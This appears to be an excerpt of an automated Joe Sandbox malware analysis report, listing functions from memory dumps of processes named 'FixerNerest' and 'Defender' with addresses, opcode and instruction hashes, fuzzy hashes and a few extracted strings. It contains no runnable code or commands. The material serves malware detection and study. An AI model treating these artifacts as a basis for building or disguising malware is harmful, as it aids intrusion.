                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 759983fe263f38a3526dd5ae168941c9e817fcb722fb93e27eb1c5169d5a5677
                                                                                                                                                                                                                                            • Instruction ID: 238cd177395ffe28eac2dc42afaf1260c45ac3685f87502af80afb28287b61bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 759983fe263f38a3526dd5ae168941c9e817fcb722fb93e27eb1c5169d5a5677
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6631EF31E1D86A4FEB95B72894586FC76E1EFA9790F180077D40EE31D2DF2CA8818745
                                                                                                                                                                                                                                            Function 00007FF848F37171 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 14bece4a411e9940e9d8fbe8f2d7be6a1bc0df31d997333b4936c8283c2e6dfd
                                                                                                                                                                                                                                            • Instruction ID: 66127594ee5444ba65a5086a9da4c6e2583404c50ac5e90dec28efac09c6cb4d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14bece4a411e9940e9d8fbe8f2d7be6a1bc0df31d997333b4936c8283c2e6dfd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0416161E1EA8B2FE75077F810262BF5CA19F91281F914476E04DC76CBEE2CAA014369
                                                                                                                                                                                                                                            Function 00007FF848F3F7ED Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: eae226e4eed6b93d358c23b7754f296ffa57cea68fee2a32f9808e0feb10163e
                                                                                                                                                                                                                                            • Instruction ID: af43a102dfe3fad9742b32b948cec7ec6c67c78211fa2397ff5fda4ad0e3ba5d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eae226e4eed6b93d358c23b7754f296ffa57cea68fee2a32f9808e0feb10163e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD317A31E1CA5D8FEB84EB688849AECBBE1EF58350F1400B7D40DD32D1DB2868818784
                                                                                                                                                                                                                                            Function 00007FF848F40B80 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 645becf13002a9a8dd0f5ef538405b193520ec4c23f4e1224dbeebe2a0448bf4
                                                                                                                                                                                                                                            • Instruction ID: 5f7ae20f485196bcdf89f17ece54975e2edb6bc883a628ab463f6f96654907e2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 645becf13002a9a8dd0f5ef538405b193520ec4c23f4e1224dbeebe2a0448bf4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5221F621E1D86A0FF7A9733868551B815C1EFA5B90F584077D84DE31D6EF0C9CC14389
                                                                                                                                                                                                                                            Function 00007FF848F3E735 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c66d2f33d697d90c6239d74b307e6bcdf4a20cc0a8939ef22d8214ba6be93f2c
                                                                                                                                                                                                                                            • Instruction ID: 8737e7fa4d12f759e3080ef7819a567f7319833ca1e174c2d1acd3cbf03d6210
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c66d2f33d697d90c6239d74b307e6bcdf4a20cc0a8939ef22d8214ba6be93f2c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E521CF32E0D99A4FFB95B76C44691B86BD1EF55291F0A00B7D41CC75D3CE085C498355
                                                                                                                                                                                                                                            Function 00007FF848F401EC Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 023ab831b6d55925e020162b53023052dc76876a4850d71a7533698dc07177f6
                                                                                                                                                                                                                                            • Instruction ID: 7e3c994ff2656b618b8b9b928fd521611169e253a07a429aa5951a7a7d921208
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 023ab831b6d55925e020162b53023052dc76876a4850d71a7533698dc07177f6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7219D32DAC96D8FEB90F768D4455E9B7D1EF98750F040476D85EE32C2DE28AD408784
                                                                                                                                                                                                                                            Function 00007FF848F3E831 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bf332bc73cec8dc41a73cb4a34a2c0b68430e073fbb3cfc6b000970759ac177e
                                                                                                                                                                                                                                            • Instruction ID: dfac54dda3206ac890195ef9789bf4259932e8feb320269fd2f3352b0b998d06
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf332bc73cec8dc41a73cb4a34a2c0b68430e073fbb3cfc6b000970759ac177e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33218C30D0CA4D8FEB58BB68C4556F977A0EF48380FA440BBE54DD2AC1CF38A8448B85
                                                                                                                                                                                                                                            Function 00007FF848F3E8EF Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 717acfd67921808c0cbfff26489da4b1dc7c7f238e89b49d053e361bce2d7cac
                                                                                                                                                                                                                                            • Instruction ID: 9ec3ecafdd74b19c34030ef831ebb13c4a8218e84995bdf4b5254dc73d5e6683
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 717acfd67921808c0cbfff26489da4b1dc7c7f238e89b49d053e361bce2d7cac
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EE0DF32C4E94D8FCB84BBA8AC022A53BA0FF09308F00006AD14CC31C2D7295A90C786
                                                                                                                                                                                                                                            Function 00007FF848F40AAA Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d2a216a5d3f77bdda8476fefb8acfcbe550fe79b1db718094a115decee67192b
                                                                                                                                                                                                                                            • Instruction ID: 48c5f6835091c82287b3f1e4ae70b0c78856c51fe2cdf2858f05773144d4f5c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2a216a5d3f77bdda8476fefb8acfcbe550fe79b1db718094a115decee67192b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74D05E32B1C1140AFB0CA65CB8431FCB392EBC8630F04143BE64BA2182DD1928220199
                                                                                                                                                                                                                                            Function 00007FF848F35D3A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: fe4010c6c6b37ef67dd1ac002e58db11bc3254628805571bddbdd0245c3e0b32
                                                                                                                                                                                                                                            • Instruction ID: bbdf960186c0262dc84df199e64d2301dc85c35d1c1a9986afce985fe2064413
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe4010c6c6b37ef67dd1ac002e58db11bc3254628805571bddbdd0245c3e0b32
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80D0923191650DABDB44EB64A4511EEBAB1EF88250F8040B6A44DA2292DF392A558748
                                                                                                                                                                                                                                            Function 00007FF848F34DFB Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4453a8f59b5258ccd0891336ac1d1826ff498a6420a6a8a754ea8f498348e89b
                                                                                                                                                                                                                                            • Instruction ID: 2c0ae7f557b3dbf5b37df9c07deb5544d597b974630f9b245cf879e8f7ac4350
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4453a8f59b5258ccd0891336ac1d1826ff498a6420a6a8a754ea8f498348e89b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00007FF848F2833A Relevance: 1.3, Instructions: 1291COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ca29c35bfe85be8201fb02c677458b0c2dc08aeefe70a60899fac5eb757c443f
                                                                                                                                                                                                                                            • Instruction ID: a7378aba8a1cc9b0ea0d8b0f1e89f37c685c0ba5cce122e383b12ad2a72e3a62
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca29c35bfe85be8201fb02c677458b0c2dc08aeefe70a60899fac5eb757c443f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04A2C730D2D6970FEB6BB33868251753FA19F52381F8414BAC449C71D3EF1E681A939A
                                                                                                                                                                                                                                            Function 00007FF848F28B56 Relevance: .6, Instructions: 553COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 43367223a2f4d89572aeacf17ee3eaa5a0ad5c118c7a104b505ebbcddec87f29
                                                                                                                                                                                                                                            • Instruction ID: 6dfcf93ec54b1334989918da820bc15c5c1564d196a9275e0be1fbda165344f2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43367223a2f4d89572aeacf17ee3eaa5a0ad5c118c7a104b505ebbcddec87f29
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7312132095E3D20FE717A7746C251A53FB19F53251F4A01FBC1C9CB0E3DA0E685A93A6
                                                                                                                                                                                                                                            Function 00007FF848F2C7E6 Relevance: .5, Instructions: 475COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 04417b25a312f3a7c60134c6278bd7bcd74d48e5616572dc4a18d1456dc8a698
                                                                                                                                                                                                                                            • Instruction ID: 968787f1cf3c31bc32fb57ba47b3b5f442cbe3d34a1cbc0a6c3705b2167d5ce7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04417b25a312f3a7c60134c6278bd7bcd74d48e5616572dc4a18d1456dc8a698
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F1A23090CA8D8FEBA8EF28D8557E937E1FF54350F04426EE84DC7291DB3999458B86
                                                                                                                                                                                                                                            Function 00007FF848F2D592 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 667a334dce32213be9c4af774a44d8c9ce89c13f49dbbfe3e00a0a8aebed4493
                                                                                                                                                                                                                                            • Instruction ID: ca79fd0a6fca23531618693a8489611797a9bcf07dcd605e955444255639d4e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 667a334dce32213be9c4af774a44d8c9ce89c13f49dbbfe3e00a0a8aebed4493
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6E1B23090CA8E8FEBA8EF28D8557E937D1EF54350F14426AE84DC72D1DF79A8448B81
                                                                                                                                                                                                                                            Function 00007FF848F26CFA Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: `KH$#CN_^
                                                                                                                                                                                                                                            • API String ID: 0-1010693636
                                                                                                                                                                                                                                            • Opcode ID: d4666239e1940fd5da5acc067321e1607c562d70b788ef0abdb24a2ee60196a0
                                                                                                                                                                                                                                            • Instruction ID: 6bc0f7d28c93e04eadeab7bf95fcc558ecff2ed79eb150588d06d877b78b37f0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4666239e1940fd5da5acc067321e1607c562d70b788ef0abdb24a2ee60196a0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FC17B30A1D9198FEB89F72CA455BBAB3D2FF98350F640579E00DC32D2DE2DA8418755
                                                                                                                                                                                                                                            Function 00007FF848F308FA Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ;M_^
                                                                                                                                                                                                                                            • API String ID: 0-3487335239
                                                                                                                                                                                                                                            • Opcode ID: 2f4ed7ff09e9ff55cde86ff8fa7773cf2be4cb05cbdfe7ea01a43c2e1c92dd90
                                                                                                                                                                                                                                            • Instruction ID: b54ab37b8f4d574d86a83ac789484cc0d14a7145f0cb57c6efb9e1ac2b4ca9b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f4ed7ff09e9ff55cde86ff8fa7773cf2be4cb05cbdfe7ea01a43c2e1c92dd90
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3251F432E1D96A9FEB58FB2CA8450E977D1EFA4760F14027BD40DC72C7DE2898068384
                                                                                                                                                                                                                                            Function 00007FF848F30489 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ?M_^
                                                                                                                                                                                                                                            • API String ID: 0-1086198800
                                                                                                                                                                                                                                            • Opcode ID: 7186c2ecd838db0fc796fb847205d765296e305a5c8f34bb7f80ea02f0013c15
                                                                                                                                                                                                                                            • Instruction ID: 5894356a9530dad61739faaa607cad1961d4d1caa26758ca147884ff2f50d689
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7186c2ecd838db0fc796fb847205d765296e305a5c8f34bb7f80ea02f0013c15
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F011E53191E6CA5FE752772868210E67FB0EF87268F0902F7D48CCA0D3DA0C18568366
                                                                                                                                                                                                                                            Function 00007FF848F24DFA Relevance: 1.3, Strings: 1, Instructions: 2COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ^
                                                                                                                                                                                                                                            • API String ID: 0-1590793086
                                                                                                                                                                                                                                            • Opcode ID: 79e02effed17577b1df7a1a93e80f9bb22eba86c9b543a655a50ef9709293ffe
                                                                                                                                                                                                                                            • Instruction ID: aaf21455ad5a42e349483cab415bcea0c4518bcd5b5ab6565617bcde728c6bd1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79e02effed17577b1df7a1a93e80f9bb22eba86c9b543a655a50ef9709293ffe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                            Function 00007FF848F2C2E9 Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a806e663962e396075d46eb663712a3b956629d996bb05bce48123f052e0a7fa
                                                                                                                                                                                                                                            • Instruction ID: 964a205f1ca7b6a6d27d6844ec8ac4f28c3ead39d09b96c8d934936f59df4380
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a806e663962e396075d46eb663712a3b956629d996bb05bce48123f052e0a7fa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DD1A23090CA898FEB68EF28D8567F977D1FF54350F04426EE84DC7291DB75A8458B82
                                                                                                                                                                                                                                            Function 00007FF848F2E949 Relevance: .4, Instructions: 376COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a0c56e2ea04ca2dca55514c3351c3b597d4d97f230467d14ca1f1fd7c53bde38
                                                                                                                                                                                                                                            • Instruction ID: 10b054898105937d78b2c54204c30f16e713a952e0e88c6455b88164d29e1c7b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0c56e2ea04ca2dca55514c3351c3b597d4d97f230467d14ca1f1fd7c53bde38
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85B1EF30E1DA098FE794FBA8989AAB977E2FF99350F14017AD00DC32D3DE2968418755
                                                                                                                                                                                                                                            Function 00007FF848F2D1A6 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bc1e8424f0fcb468d50b9ecbd4941eb6a1593b217c4efbf8bce70b028b5ac7e1
                                                                                                                                                                                                                                            • Instruction ID: 377e8fe6d3099011d036ea383c317fcdb9231f60a78a0141b0ec23200b3a8e10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc1e8424f0fcb468d50b9ecbd4941eb6a1593b217c4efbf8bce70b028b5ac7e1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22B1E43050CA8D4FEBA8EF28D8557E93BE0FF55350F04426AE84DC72D2CB74A9458B86
                                                                                                                                                                                                                                            Function 00007FF848F2F4BD Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 711c88743bd2e6fbd381057b7ab810a3bc3c3465ba3461eb705e3e8898971429
                                                                                                                                                                                                                                            • Instruction ID: 233415b5e665364091bd5601da7df40906ee496d8214f3badcb5aa62f76feff7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 711c88743bd2e6fbd381057b7ab810a3bc3c3465ba3461eb705e3e8898971429
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2918C31F7D80A5FF7A4A72CD85277962D2EB887A0F5902B5D40CC72DADD2DAC828341
                                                                                                                                                                                                                                            Function 00007FF848F2A0DC Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2592739682.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848f20000_Defender.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 21f555aea58df54ee3133da248fb0d5a8374419d8dd270212db17f9e516fcc95
                                                                                                                                                                                                                                            • Instruction ID: 7ea067dd1a9338411262fa7d06c3f507eb3070289865e6882ea4f7301301af95
